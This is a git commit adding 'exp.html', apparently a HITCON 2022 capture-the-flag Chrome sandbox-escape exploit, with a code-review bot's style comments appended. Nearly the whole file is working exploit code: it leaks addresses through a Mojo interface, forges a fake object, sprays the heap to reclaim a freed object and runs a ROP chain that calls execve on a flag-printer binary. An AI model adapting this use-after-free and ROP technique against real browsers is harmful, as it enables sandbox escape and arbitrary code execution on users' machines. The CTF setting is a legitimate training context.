Commit 583ae1b

Create exp.html
1 parent 9ea8bc7 commit 583ae1b


1 file changed

+224
-0
lines changed

1 file changed

+224
-0
lines changed

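--- /dev/null
+++ b/2022/hitcon-2022/sbx/exp.html
@@ -0,0 +1,224 @@
+<html>
+<body></body>
+<script src="mojo_bindings/mojo_bindings.js"></script>
+<script src="mojo_bindings/third_party/blink/public/mojom/sandbox/sandbox.mojom.js"></script>
+<script src="mojo_bindings/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
+<script>
+var heap;
+var replace_data;
+var count = 0;
+var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
+var kSandboxServiceSize = 0x820; // maybe increase further
+var kSpraySize = 3;
+var p = 0;
+
+
+stringToBytes = string => Array.prototype.map.call(string + "\x00", v => v.charCodeAt(0));
+
+function initHeap(obj_ptr){
+console.log("initHeap");
+replace_data = new Uint8Array(kSandboxServiceSize+0x800).fill(0x23);
+var u64 = new BigInt64Array(replace_data.buffer);
+var base_index = 0x800 / 8 ;
+u64[base_index + 0] = obj_ptr + 0x18n// - 0x20n; // vtable
+u64[base_index + 1] = 0x1337n; // id
+u64[base_index + 2] = 0n; // isProcess
+u64[base_index + 3] = 0x69696969n;
+u64[base_index + (0x800/8)] = 0x773311773311n;
+u64[base_index + (0x818/8)] = 0n; // backup
+
+
+}
+
+
+
+
+var spray_ptrs = [];
+var old_sprays = [];
+function reinitialize_spray(){
+old_sprays.push(spray_ptrs);
+spray_ptrs = [];
+for(var i = 0; i < kSpraySize; i++){
+spray_ptrs[i] = new blink.mojom.SandboxPtr();
+Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(spray_ptrs[i]).handle, "context", true);
+}
+}
+
+
+function spray(){
+//await allocate(replace_data.buffer);
+
+for(var i =0; i < kSpraySize; i++){
+spray_ptrs[i].pourSand(replace_data)
+}
+
+// console.log("spray!!")
+}
+
+function int2bint(arr){
+var r = [];
+for(var i = 0; i < arr.byteLength; i++)
+r.push(BigInt(arr[i]));
+return r;
+}
+
+async function main(){
+var sandbox_ptr = new blink.mojom.SandboxPtr();
+
+Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(sandbox_ptr).handle, "context", true);
+
+
+
+var base_addr = BigInt((await sandbox_ptr.getTextAddress()).addr) - 0x627fc20n;
+var service_ptr = (await sandbox_ptr.getHeapAddress()).addr;
+
+console.log("base : "+base_addr.toString(16));;
+console.log("service ptr : "+service_ptr.toString(16));
+var fake_obj_ptr = BigInt(service_ptr) + 0x20n;
+console.log("Exploit start");
+
+
+// init fake sandboximpl
+
+var fake_obj = new Uint8Array(0x800).fill(0xcb);
+
+
+var u8 = new Uint8Array(fake_obj.buffer);
+string = ""
+
+var flag_printer = stringToBytes("/home/chrome/flag_printer");
+for(var i = 0; i < flag_printer.length; i++){
+u8[0x600-0x11 + i] = flag_printer[i]
+}
+
+/* layout
+gef➤ x/10gx 0x187400683c00
+0x187400683c00: 0x000056158e9ac870 0x0000000000000001
+0x187400683c10: 0x1111111111111100 0x1111111111111111
+0x187400683c20: 0x1111111111111111 0x1111111111111111
+0x187400683c30: 0x1111111111111111 0x1111111111111111
+0x187400683c40: 0x1111111111111111 0x1111111111111111
+*/
+
+
+var u64 = new BigUint64Array(fake_obj.buffer);
+var idx = 0;
+// u64[idx++] = 0x414142424343n;
+// u64[idx++] = 0xcbcbcbcbcbcbn;
+
+// TODO fixup base addr
+xchg_rax_rsp = base_addr + 0x0000000005c3e9b2n; // : xchg rax, rsp ; ret
+pop_rdi_ret = base_addr + 0x00000000038da5adn;
+add_rsp_pop_rbp = base_addr + 0x00000000039f45dcn; // : add rsp, 0x40 ; pop rbp ; ret
+pop_rsi_ret = base_addr + 0x0000000003a0af9en;
+pop_rdx_ret = base_addr + 0x00000000039fbe92n;
+pop_rax_ret = base_addr + 0x0000000003897616n;
+syscall = base_addr + 0x00000000038787ban;
+var dw = new DataView(fake_obj.buffer,0x27);
+// rop chain start
+// here it points after xchg rax rsp, move stack after the gadget
+dw.setBigUint64((idx++ * 8),add_rsp_pop_rbp, true)
+dw.setBigUint64((idx++ * 8),0x101010101n, true)
+dw.setBigUint64((idx++ * 8),0x101010101n, true)
+dw.setBigUint64((idx++ * 8),0x101010101n, true)
+
+// initial rip here
+dw.setBigUint64((idx++ * 8),xchg_rax_rsp, true)
+
+// real rop chain here
+idx = 0x50 / 8;
+// dw.setBigUint64((idx++ * 8),0x101010101n, true)
+dw.setBigUint64((idx++ * 8),pop_rax_ret, true)
+dw.setBigUint64((idx++ * 8),59n, true) // execve
+dw.setBigUint64((idx++ * 8),pop_rdi_ret, true)
+dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x600n, true)
+dw.setBigUint64((idx++ * 8),pop_rsi_ret, true)
+dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x700n, true)
+dw.setBigUint64((idx++ * 8),pop_rdx_ret, true)
+dw.setBigUint64((idx++ * 8),fake_obj_ptr - 0x20n + 0x720n, true)
+dw.setBigUint64((idx++ * 8),syscall, true)
+dw.setBigUint64((idx++ * 8),0x1010201n, true)
+
+// argvp
+dw.setBigUint64((0x700 - 0x27 - 0x11),fake_obj_ptr + 0x600n - 0x20n,true);
+dw.setBigUint64((0x700 - 0x27 - 0x11) + 8,0n,true);
+
+// envp
+dw.setBigUint64((0x720 - 0x27 - 0x11),0n,true);
+
+// dw.setBigUint64((idx++ * 8),0x101010101n, true)
+// dw.setBigUint64((idx++ * 8),0x101010102n, true)
+// dw.setBigUint64((idx++ * 8),0x101010103n, true)
+// dw.setBigUint64((idx++ * 8),0x101010104n, true)
+// dw.setBigUint64((idx++ * 8),0x101010105n, true)
+
+await sandbox_ptr.pourSand(fake_obj);
+
+initHeap(fake_obj_ptr);
+var N = 400;
+var frames = [];
+
+// allocate RFH
+
+
+// for (var i = 0; i < N; i++) {
+// var frame = allocate_rfh();
+// frames.push(frame);
+// }
+// setTimeout(function(){
+// console.log("trigger");
+// for (var i = 0; i < N; i++) {
+// frames[i].contentWindow.trigger();
+// deallocate_rfh(frames[i]);
+
+// }
+// console.log("end");
+// },1000);
+// setTimeout(function() {
+// location = '';
+// }, 3000);
+while (1){
+let nogc = [];
+async function trigger(){
+reinitialize_spray();
+const kTriggerCount = 100;
+var sbx_ptrs = new Array(kTriggerCount);
+var reclaim_inst = new blink.mojom.SandboxPtr();
+Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(reclaim_inst).handle, "context", true);
+for(var i = 0 ; i < kTriggerCount; i++){
+sbx_ptrs[i] = new blink.mojom.SandboxPtr();
+Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(sbx_ptrs[i]).handle, "context", true);
+
+}
+var del_index = kTriggerCount - 1;
+console.log("alloc sbx_ptr @ 0x" + (await sbx_ptrs[del_index].getHeapAddress()).addr.toString(16));
+
+var arr = replace_data
+for(var i = 0; i < kTriggerCount; i++){
+sbx_ptrs[i].pourSand(arr);
+
+}
+// for(var j = kTriggerCount - 1; j >= 0; j--){
+
+// sbx_ptrs[j].ptr.reset();
+// spray()
+// }
+// spray();
+sbx_ptrs[del_index].ptr.reset();
+spray();
+
+// function sleep(ms) {
+// return new Promise(resolve => setTimeout(resolve, ms));
+// }
+
+nogc.push(sbx_ptrs)
+nogc.push(reclaim_inst)
+// await sleep(1000);
+
+}
+await trigger();
+}
+}
+main();
+</script>
+</html>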
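Review bot: `stringToBytes` (line 16), `string` (line 87) and the seven gadget addresses assigned at lines 110–116 are never declared, so the script runs in sloppy mode and each becomes an implicit property on `window`; prefix each with `const` (e.g. `const stringToBytes = string => Array.prototype.map.call(string + "\x00", v => v.charCodeAt(0));`, `const syscall = base_addr + 0x00000000038787ban;`) so a misspelled name fails loudly instead of silently creating another global. `heap`, `count`, `p`, `blob_registry_ptr`, `int2bint`, `N` and `frames` are declared but never read, and the commented-out blocks at lines 164–179 and 201–212 are dead code that could be removed or moved into a note. The constants at line 72 and lines 110–116 are build-specific offsets with only a `// TODO fixup base addr` beside them; a header comment recording which build they were extracted from would make the file readable later. The `while (1)` at line 180 has no exit condition, which is presumably intentional but deserves a one-line comment saying so.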
